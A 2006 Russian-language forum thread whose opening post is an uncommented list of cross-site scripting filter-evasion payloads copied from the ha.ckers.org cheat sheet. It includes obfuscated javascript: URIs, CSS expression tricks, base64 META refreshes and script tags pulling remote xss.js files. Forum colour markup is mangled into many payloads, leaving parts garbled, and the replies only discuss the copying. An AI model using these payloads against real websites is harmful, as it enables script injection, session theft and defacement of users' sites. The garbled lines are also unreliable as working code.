Cross Site Scripting (XSS)

reD_ra#036;Ca1 · 23.07.2006

>
<IMG SRC=`javascript:alert("bla bla, 'XSS'")`>
<IMG """><script>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114
&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114
&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
<IMG SRC=" javascript:alert('XSS');">
<script/XSS SRC="http://server.org/xss.js"></SCRIPT>
<<script>alert("XSS");//<</SCRIPT>
<script SRC=http://server.org/xss.js?<B>
<IMG SRC="javascript:alert('XSS')"
<script>a=/XSS/ alert(a.source)</SCRIPT>
\";alert('XSS');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://server.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://server.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://server.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://server.org/xssmoz.xml#xss")}</STYLE>
<XSS STYLE="behavior: url(xss.htc);">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:

Код:

[/color]">
<[color=blue]IMG SRC[/color]="[color=orange]livescript:[code][/color]">
<[color=blue]META HTTP-EQUIV[/color]="[color=orange]refresh[/color]" CONTENT="[color=orange]0;url=javascript:alert('XSS');[/color]">
<[color=blue]META HTTP-EQUIV[/color]="[color=orange]refresh[/color]" CONTENT="[color=orange]0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K[/color]">
<[color=blue]META HTTP-EQUIV[/color]="[color=orange]Link[/color]" Content="[color=orange]<javascript:alert('XSS')>; REL=stylesheet[/color]">
<[color=blue]META HTTP-EQUIV[/color]="[color=orange]refresh[/color]" CONTENT="[color=orange]0; URL=http://;URL=javascript:alert('XSS');[/color]">
<[color=blue]IFRAME SRC[/color]="[color=orange]javascript:alert('XSS');[/color]"><[color=blue]/IFRAME[/color]>
<[color=blue]FRAMESET[/color]><[color=blue]FRAME SRC[/color]="[color=orange]javascript:alert('XSS');[/color]"><[color=blue]/FRAMESET[/color]>
<[color=blue]TABLE BACKGROUND[/color]="[color=orange]javascript:alert('XSS')[/color]">
<[color=blue]DIV
STYLE[/color]="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\
0070\0074\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">
<[color=blue]DIV STYLE[/color]="[color=orange]background-image: url(javascript:alert('XSS'))[/color]">
<[color=blue]DIV STYLE[/color]="[color=orange]width: expression(alert('XSS'));[/color]">
<[color=blue]STYLE[/color]>@im\port'\ja\vasc\ript:alert("XSS")';<[color=blue]/STYLE[/color]>
<[color=blue]IMG STYLE[/color]="[color=orange]xss:expr/*XSS*/ession(alert('XSS'))[/color]">
<[color=blue]XSS STYLE[/color]="[color=orange]xss:expression(alert('XSS'))[/color]">
<[color=blue]XSS STYLE[/color]='[color=orange]no\xss:noxss("*//*");xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))[/color]'>
<[color=blue]STYLE TYPE[/color]="[color=orange]text/javascript[/color]">alert('XSS');<[color=blue]/STYLE[/color]>
<[color=blue]STYLE[/color]>.XSS{background-image:url("javascript:alert('XSS')");}<[color=blue]/STYLE[/color]><[color=blue]A CLASS=XSS[/color]><[color=blue]/A[/color]>
<[color=blue]STYLE TYPE[/color]="[color=orange]text/javascript[/color]">alert('XSS');<[color=blue]/STYLE[/color]>
<[color=blue]STYLE[/color]>.XSS{background-image:url("javascript:alert('XSS')");}<[color=blue]/STYLE[/color]><[color=blue]A CLASS=XSS[/color]><[color=blue]/A[/color]>
<[color=blue]STYLE type[/color]="[color=orange]text/css[/color]">BODY{background:url("javascript:alert('XSS')")}<[color=blue]/STYLE[/color]>
<!--[if gte IE 4]>
<script>alert('XSS');<[color=blue]/SCRIPT[/color]>
<![endif]-->
<[color=blue]BASE HREF[/color]="[color=orange]javascript:alert('XSS');//[/color]">
<[color=blue]OBJECT TYPE[/color]="[color=orange]text/x-scriptlet[/color]" DATA="[color=orange]http://ha.ckers.org/scriptlet.html[/color]"><[color=blue]/OBJECT[/color]>
<[color=blue]OBJECT
classid[/color]=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><[color=blue]param
name=url value[/color]=javascript:alert('XSS')><[color=blue]/OBJECT[/color]>
getURL("javascript:alert('XSS')")
<HTML xmlns:xss>
  <[color=blue]?import namespace[/color]="[color=orange]xss[/color]" implementation="[color=orange]http://ha.ckers.org/xss.htc[/color]">
  <xss:xss>XSS</xss:xss>
<[color=blue]/HTML[/color]>
<[color=blue]XML ID=I[/color]><[color=blue]X[/color]><[color=blue]C[/color]><![CDATA[<[color=blue]IMG SRC[/color]="[color=orange]javas]]><![CDATA[cript:alert('XSS');[/color]">]]>
<[color=blue]/C[/color]><[color=blue]/X[/color]><[color=blue]/xml[/color]><[color=blue]SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML[/color]><[color=blue]/SPAN[/color]>
<[color=blue]XML
ID[/color]="[color=orange]xss[/color]"><[color=blue]I[/color]><[color=blue]B[/color]>&lt;IMG SRC="javas<!--
-->cript:alert('XSS')"&gt;<[color=blue]/B[/color]><[color=blue]/I[/color]><[color=blue]/XML[/color]>
<[color=blue]SPAN DATASRC[/color]="[color=orange]#xss[/color]" DATAFLD="[color=orange]B[/color]" DATAFORMATAS="[color=orange]HTML[/color]"><[color=blue]/SPAN[/color]>
<[color=blue]XML SRC[/color]="[color=orange]xsstest.xml[/color]" ID=I><[color=blue]/XML[/color]>
<[color=blue]SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML[/color]><[color=blue]/SPAN[/color]>
<script SRC="[color=orange]http://server.org/xss.jpg[/color]"><[color=blue]/SCRIPT[/color]>
<? echo('<SCR)';
echo('IPT>alert("XSS")<[color=blue]/SCRIPT[/color]>'); ?>
<[color=blue]IMG SRC[/color]="[color=orange]http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode[/color]">
<[color=blue]META HTTP-EQUIV[/color]="[color=orange]Set-Cookie[/color]" Content="[color=orange]USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;[/color]">
<script a="[color=orange]>[/color]" SRC="[color=orange]http://server.org/xss.js[/color]"><[color=blue]/SCRIPT[/color]>
<script ="[color=orange]>[/color]" SRC="[color=orange]http://server.org/xss.js[/color]"><[color=blue]/SCRIPT[/color]>
<script a="[color=orange]>[/color]" '' SRC="[color=orange]http://server.org/xss.js[/color]"><[color=blue]/SCRIPT[/color]>
<script "a='[color=orange]>'[/color]" SRC="[color=orange]http://server.org/xss.js[/color]"><[color=blue]/SCRIPT[/color]>
<script a=`>` SRC="[color=orange]http://server.org/xss.js[/color]"><[color=blue]/SCRIPT[/color]>
<script a="[color=orange]>[/color]'>" SRC="[color=orange]http://server.org/xss.js[/color]"><[color=blue]/SCRIPT[/color]>
<script>document.write("<SCRI");<[color=blue]/SCRIPT[/color]>PT SRC="[color=orange]http://server.org/xss.js[/color]"><[color=blue]/SCRIPT[/color]>
<[color=blue]A HREF[/color]="[color=orange]http://66.102.7.147/[/color]">XSS<[color=blue]/A[/color]>
<[color=blue]A HREF[/color]="[color=orange]http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D[/color]">XSS<[color=blue]/A[/color]>
<[color=blue]A HREF[/color]="[color=orange]//www.google.com/[/color]">XSS<[color=blue]/A[/color]>

Оригинал статьи размещен на www.ha.ckers.org

spee · 25.07.2006

это типа фсё с http://ha.ckers.org в адном флаконе?

копипаст рулит?

dinar_007 · 25.07.2006

А где копирайт? =) Где пояснения для тех, кому не понятно? =) А так, неплохо...

reD_ra#036;Ca1 · 26.07.2006

spee
Хмм, действительно с ха.керс.орг. У меня просто вся инфа в тхт файле была.

dinar_007
Копирайт добавил, но вот объяснения к каждой строке писать это не реально.

Cross Site Scripting (XSS)

reD_ra#036;Ca1

RAID-массив

spee

floppy-диск

dinar_007

RAM

reD_ra#036;Ca1

RAID-массив